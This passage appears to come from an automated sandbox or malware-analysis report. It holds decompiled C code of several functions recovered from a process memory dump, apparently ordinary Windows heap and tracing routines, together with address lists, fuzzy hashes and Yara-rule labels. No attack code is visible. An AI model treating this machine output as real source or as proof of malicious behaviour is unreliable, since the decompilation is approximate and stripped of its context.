									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E0168FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E0168FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E015F99BF(__ecx, _t87,  &_v16, 0);
					E015FA830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E0168FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}

0x015fb23f
0x015fb246
0x015fb249
0x015fb24b
0x015fb251
0x015fb258
0x015fb262
0x015fb2b2
0x015fb2b6
0x015fb456
0x015fb456
0x015fb45a
0x01642912
0x01642914
0x01642916
0x00000000
0x00000000
0x0164291f
0x01642921
0x00000000
0x00000000
0x01642927
0x00000000
0x01642927
0x015fb460
0x015fb460
0x015fb462
0x015fb464
0x0164292e
0x01642931
0x0164293f
0x01642945
0x01642945
0x01642931
0x00000000
0x015fb464
0x015fb2bc
0x015fb2bf
0x015fb2c5
0x015fb2c8
0x015fb2ca
0x016427af
0x016427af
0x015fb2d0
0x015fb2d7
0x015fb437
0x015fb2dd
0x015fb2dd
0x015fb2dd
0x015fb2e3
0x015fb2e5
0x015fb43e
0x015fb443
0x016427b6
0x016427b6
0x015fb443
0x015fb2f5
0x015fb2fa
0x015fb2fd
0x015fb2ff
0x015fb46f
0x015fb46f
0x015fb30a
0x015fb30f
0x015fb310
0x015fb315
0x015fb31b
0x015fb31c
0x015fb321
0x015fb322
0x015fb329
0x015fb32b
0x015fb32d
0x016427c2
0x016427c2
0x016427c5
0x016427c7
0x00000000
0x00000000
0x016427c9
0x016427cb
0x016427ce
0x016427d0
0x016427d2
0x016427d2
0x016427d5
0x016427db
0x016427e0
0x016427e1
0x016427e6
0x016427e7
0x016427ee
0x016427f0
0x016427f2
0x00000000
0x016427f4
0x016427f4
0x00000000
0x016427f4
0x016427f2
0x016427f7
0x016427f9
0x00000000
0x00000000
0x016427ff
0x00000000
0x015fb333
0x015fb333
0x015fb336
0x015fb336
0x015fb33c
0x015fb341
0x015fb344
0x015fb44e
0x015fb44e
0x015fb34a
0x015fb34d
0x015fb353
0x015fb358
0x015fb359
0x015fb35e
0x015fb35f
0x015fb366
0x015fb368
0x015fb36a
0x016428f2
0x016428fe
0x01642903
0x01642903
0x00000000
0x015fb370
0x015fb38c
0x015fb391
0x015fb393
0x0164280a
0x0164280a
0x015fb399
0x015fb39b
0x00000000
0x015fb3a1
0x015fb3a1
0x015fb3a6
0x015fb3b0
0x015fb3b2
0x0164281d
0x015fb3b8
0x015fb3b8
0x015fb3b8
0x015fb3ba
0x015fb3bd
0x01642824
0x0164282a
0x01642831
0x01642841
0x0164284b
0x0164284d
0x01642858
0x01642858
0x01642858
0x01642870
0x01642870
0x01642831
0x015fb3c3
0x015fb3c8
0x015fb3d2
0x015fb3d4
0x01642883
0x015fb3da
0x015fb3da
0x015fb3da
0x015fb3dc
0x015fb3df
0x0164288f
0x01642891
0x0164289c
0x0164289c
0x0164289c
0x016428b4
0x016428b4
0x015fb3e5
0x015fb3ea
0x015fb3ec
0x016428c7
0x015fb3f2
0x015fb3f2
0x015fb3f2
0x015fb3f7
0x015fb3fa
0x016428d9
0x016428d9
0x015fb400
0x015fb407
0x015fb40a
0x015fb40f
0x015fb413
0x015fb41f
0x015fb424
0x015fb426
0x016428e3
0x016428e8
0x016428e8
0x015fb426
0x015fb42f
0x00000000
0x015fb42f
0x015fb39b
0x015fb36a
0x015fb264
0x015fb264
0x015fb279
0x015fb27f
0x015fb287
0x015fb28c
0x015fb290
0x015fb29c
0x015fb2a3
0x016427a0
0x016427a5
0x016427a5
0x015fb2a3
0x015fb2a9
0x015fb2b1
0x015fb2b1

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction ID: 8b980a814e2fbb3c383a0c7d97674d200cd5dd9b648b9ed399944abb735c5d82
Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction Fuzzy Hash: DCB19D75A00606DFEB15DBA9CCA0B7EBBE6BF88200F25456DE642DB381D730D945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015E849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E015E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x16af9c0);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x16c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E015ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E015F2280( *[fs:0x30], 0x16c8550);
						_t139 =  *0x16c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0160F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E015EFFB0(_t193, _t235, 0x16c8550);
								L5:
								return E0162D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E015D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x16c7b9c; // 0x0
							_t235 = L015F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x16c7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0160A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E015EFFB0(_t193, _t235, 0x16c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L015F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L015F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x16c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x16c7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x16c7b9c; // 0x0
									_t214 = L015F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x16c7b10 =  *0x16c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x16c7b04 =  *0x16c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L015F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L015F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x16c7b08 =  *0x16c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0161F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L015F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0160A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L015F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x015e849b
0x015e849b
0x015e849b
0x015e849b
0x015e849d
0x015e84a2
0x015e84a7
0x015e84b1
0x015e84d8
0x00000000
0x015e84b3
0x015e84c4
0x015e84c9
0x015e84cd
0x015e84cf
0x015e84cf
0x015e84d6
0x015e84e6
0x015e84e9
0x015e84ec
0x015e84ef
0x015e84f2
0x015e84f4
0x015e84fc
0x015e8501
0x015e8506
0x015e8509
0x015e86e0
0x015e86e5
0x015e86e8
0x015e86ed
0x015e86f0
0x015e86f2
0x01639afd
0x01639b02
0x015e84da
0x015e84df
0x015e84df
0x015e86fa
0x015e86fd
0x015e86fe
0x015e8701
0x015e8706
0x015e8709
0x015e870b
0x00000000
0x00000000
0x015e8711
0x015e8725
0x015e8727
0x015e872a
0x015e872c
0x01639af0
0x01639af5
0x015e8732
0x015e8732
0x015e8732
0x015e8735
0x015e8737
0x015e8515
0x015e8515
0x015e8518
0x015e851d
0x015e8523
0x015e8527
0x015e852b
0x015e8537
0x015e8539
0x015e853c
0x015e853e
0x015e868c
0x015e8691
0x015e8699
0x015e869b
0x015e8744
0x015e8748
0x015e86a1
0x015e86a1
0x015e86a1
0x015e86a4
0x015e86a8
0x01639bdf
0x01639bdf
0x015e86ae
0x015e86b0
0x00000000
0x015e86b6
0x00000000
0x01639be9
0x015e86b0
0x015e8544
0x015e854a
0x015e854d
0x015e8551
0x015e876e
0x015e8778
0x015e877b
0x015e8780
0x015e8557
0x015e8557
0x015e855d
0x015e855d
0x015e856b
0x015e856e
0x015e8570
0x015e8573
0x015e8576
0x015e8576
0x015e8579
0x015e857b
0x00000000
0x00000000
0x015e8581
0x015e85a0
0x015e85a2
0x015e85a5
0x015e85a7
0x01639b1b
0x01639b1b
0x015e862e
0x015e862e
0x015e8631
0x015e8631
0x015e8634
0x015e8636
0x015e8669
0x015e8669
0x015e866b
0x01639bbf
0x01639bc4
0x01639bc8
0x01639bce
0x01639bce
0x015e8671
0x015e8671
0x015e8674
0x015e8676
0x01639bae
0x01639bae
0x015e8676
0x015e867c
0x015e867e
0x015e8688
0x015e8688
0x00000000
0x015e867e
0x015e8638
0x015e8638
0x015e863b
0x015e863e
0x015e863f
0x015e8642
0x015e8645
0x015e8648
0x015e864d
0x01639b69
0x01639b6e
0x01639b7b
0x01639b81
0x01639b85
0x01639b89
0x01639ba7
0x01639b8b
0x01639b91
0x01639b9a
0x01639b9f
0x01639b9f
0x015e8788
0x015e878d
0x015e8763
0x015e8763
0x015e8766
0x00000000
0x015e8766
0x01639b70
0x00000000
0x01639b70
0x015e8656
0x015e865a
0x015e865c
0x015e8752
0x015e8756
0x00000000
0x00000000
0x015e875e
0x00000000
0x015e875e
0x015e8662
0x015e8662
0x015e8662
0x015e8666
0x00000000
0x015e8666
0x015e85b7
0x015e85b9
0x015e85bc
0x015e85bf
0x015e85cc
0x015e85d1
0x015e85d4
0x015e85db
0x015e85de
0x015e85e0
0x01639b5f
0x00000000
0x01639b5f
0x015e85e6
0x015e85ea
0x015e86c3
0x015e86c5
0x015e86c8
0x015e86ca
0x01639b16
0x00000000
0x01639b16
0x015e86d6
0x015e85f6
0x015e85f6
0x015e85f9
0x015e8602
0x015e8606
0x015e860a
0x015e860b
0x015e860e
0x015e8611
0x00000000
0x015e8611
0x015e85f3
0x00000000
0x015e85f3
0x015e8619
0x015e861e
0x015e861e
0x015e8621
0x015e8622
0x015e8623
0x015e8625
0x015e862c
0x00000000
0x015e873d
0x00000000
0x015e873d
0x015e8737
0x015e850f
0x015e8512
0x00000000
0x015e8512
0x00000000
0x015e84d6

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8822eff73218f10e9a65722501228092509742334dbce312585a174e2e66ee5
Instruction ID: 78a0dd73d015a70771466ef5cee50e47464bf0d2261700097037b9066df9a80c
Opcode Fuzzy Hash: e8822eff73218f10e9a65722501228092509742334dbce312585a174e2e66ee5
Instruction Fuzzy Hash: C9B12BB0E0020ADFDB29DF99C984AAEBBF5BF98304F14452DE516AB345D770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0160513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0160513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16cd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0161D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E015F2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L015F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0161F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E015EFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x16cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0161B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01605142
0x0160514c
0x01605150
0x01605157
0x01605159
0x0160515e
0x01605165
0x01605169
0x0160516c
0x01605172
0x01605176
0x0160517a
0x0160517a
0x0160517a
0x0160517f
0x01646d8b
0x01646d8e
0x01646d91
0x01646d95
0x01646d98
0x01646d9c
0x01646da0
0x01646da3
0x01646da7
0x01646e26
0x01646e26
0x01646e2a
0x016051f9
0x016051f9
0x016051fe
0x01646e33
0x01646e33
0x01646e39
0x01646e3d
0x01646e46
0x01646e50
0x00000000
0x00000000
0x01646e52
0x01646e53
0x01646e56
0x01646e5d
0x00000000
0x00000000
0x00000000
0x01646e5f
0x01646e67
0x01646e77
0x01646e7f
0x01646e80
0x01646e88
0x01646e90
0x01646e9f
0x01646ea5
0x01646ea9
0x01646eb1
0x01646ebf
0x00000000
0x00000000
0x01646ecf
0x01646ed3
0x00000000
0x00000000
0x01646edb
0x01646ede
0x01646ee1
0x01646ee8
0x01646eeb
0x01646eed
0x01646ef0
0x01646ef4
0x01646ef8
0x01646efc
0x00000000
0x00000000
0x01646f0d
0x01646f11
0x01646f32
0x01646f37
0x01646f3b
0x01646f3e
0x01646f41
0x01646f46
0x00000000
0x00000000
0x01646f4c
0x01646f50
0x01646f50
0x01646f54
0x01646f62
0x01646f65
0x01646f6d
0x01646f7b
0x01646f7b
0x01646f93
0x01646f98
0x01646fa0
0x01646fa6
0x01646fb3
0x01646fb6
0x01646fbf
0x01646fc1
0x01646fd5
0x01646fda
0x01646fda
0x01646fdd
0x01646fe2
0x01646fe7
0x01646feb
0x01646fef
0x01646ff3
0x0160520c
0x0160520c
0x0160520f
0x01605215
0x01605234
0x0160523a
0x0160523a
0x01605244
0x01605245
0x01605246
0x01605251
0x01605251
0x01646f13
0x01646f17
0x01646f17
0x01646f18
0x01646f1b
0x01646f1f
0x01646f23
0x00000000
0x01646f28
0x01605204
0x01605204
0x01605208
0x00000000
0x01605208
0x01605185
0x01605188
0x0160518a
0x0160518e
0x01605195
0x01646db1
0x01646db5
0x01646db9
0x0160519b
0x0160519b
0x0160519e
0x016051a7
0x016051a9
0x016051a9
0x016051b5
0x016051b8
0x016051bb
0x016051be
0x016051c1
0x016051c5
0x016051c9
0x016051cd
0x016051cd
0x016051d8
0x016051dc
0x016051e0
0x01646dcc
0x01646dd0
0x01646dd5
0x01646ddd
0x01646de1
0x01646de1
0x01646de5
0x01646deb
0x01646df1
0x01646df7
0x01646dfd
0x01646e01
0x01646e05
0x01646e09
0x01646e0d
0x01646e11
0x01646e11
0x016051eb
0x01646e1a
0x01646e1f
0x01646e21
0x01646e23
0x00000000
0x016051f1
0x016051f1
0x00000000
0x016051f1

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a77cd066e80bd5bb635bb2361eca681753344b0abe948508e58f0910c295fc5
Instruction ID: caabb401776d7c7938a0ec58f2454df4f37d14fba7300625a24f7bb888012048
Opcode Fuzzy Hash: 9a77cd066e80bd5bb635bb2361eca681753344b0abe948508e58f0910c295fc5
Instruction Fuzzy Hash: F0C102755083818FD355CF28C980A5AFBE1BF89304F188A6EF9998B392D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 016003E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E016003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
